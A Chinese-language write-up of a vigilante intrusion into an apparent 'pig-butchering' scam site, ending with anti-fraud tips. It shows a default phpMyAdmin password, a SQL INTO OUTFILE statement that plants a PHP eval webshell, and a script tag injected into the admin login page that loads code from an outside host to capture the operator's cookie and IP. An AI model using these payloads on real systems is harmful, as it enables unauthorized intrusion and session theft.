0X00 事情由来
了解完事情的经过,经过我的经验判断,这应该是个杀猪盘诈骗案例
诈骗份子通过一些手段让受害人相信,通过他们可以赚钱并诱导充值杀猪盘赌博
0X01 渗透过程-大概二十分钟左右就拿下了
渗透过程简单枯燥:
看了一眼IP和端口,判断了下应该不存在云waf,直接开始扫目录
过了几分钟扫到一个http://xxxx.com.cn/u.php,原来是upupw的集成环境,如下图
思路,爆破phpmyadmin,或者找upupw的默认数据库密码,先找默认密码试试看
代码语言:javascript复制成功用系统提供的密码登录,默认的是:DRsXT5ZJ6Oi55LPQ
成功登录phpmyadmin
然后尝试getshell,由于有upupw探针,直接查看了phpinfo,有网站的绝对路径,直接尝试常规写shell
代码语言:javascript复制需要知道绝对路径、数据库root权限、数据库有写权限
具体语句:SELECT "<?php eval(@$_POST['xx']);?>" INTO OUTFILE "D:\wap\member_bak.php"
注意点:windows下,须要双反斜线,否则会转义
然后使用菜刀/蚁剑等链接即可
由于当时没有截图,目前网站已经打不开了,所以下面就直接放出拿到shell后的状态了
渗透结束,看了下权限,是system权限,不过咱们的目标是定位诈骗分子的IP信息和位置信息,接着下一步了
0X02 定位诈骗份子的IP和端口
拿到shell了就容易的多了,找后台登录的php文件插入xss代码即可
找了一圈发现,后台登录是另外一个网站目录下,编辑admin778899.php
代码语言:javascript复制echo '<sCRiPt sRC=https://xx.xx/XFXX></sCrIpT>';
等待诈骗分子登录
居然还是手机登录的,666
替换Cookie登录后台,发现并没有什么用,都是一些数字而已
去ipip.net 查询了一下IP地址信息,不出意外,果然又在境外,唉....
0X03 告知粉丝结果
过程我就直接贴和受害者的微信聊天记录了
0X04 如何防范此类诈骗
1.网络交友,要提高防骗意识,保持良好的社交心态,注意个人隐私信息的保护,特别是涉及到金钱往来,务必多渠道核实对方真实身份;
2.网络上凡是涉及带你投资理财有高收益的都视为诈骗即可;
3.骗子在朋友圈不断分享投资盈利的信息,吸引受害人主动咨询;
4.诱导受害人注册平台,投入资金。当受害人看到盈利想要提现时,平台持续以受害人银行卡号错误要求缴纳保证金、未按要求备注、账户冻结、税收等理由继续诱骗钱财,实施诈骗;
5.保持正确的投资理财观,不盲目相信无风险却高回报的投资方式,天上不会掉馅饼。
6.被骗后一定要第一时间进行报警,找警方进行止付!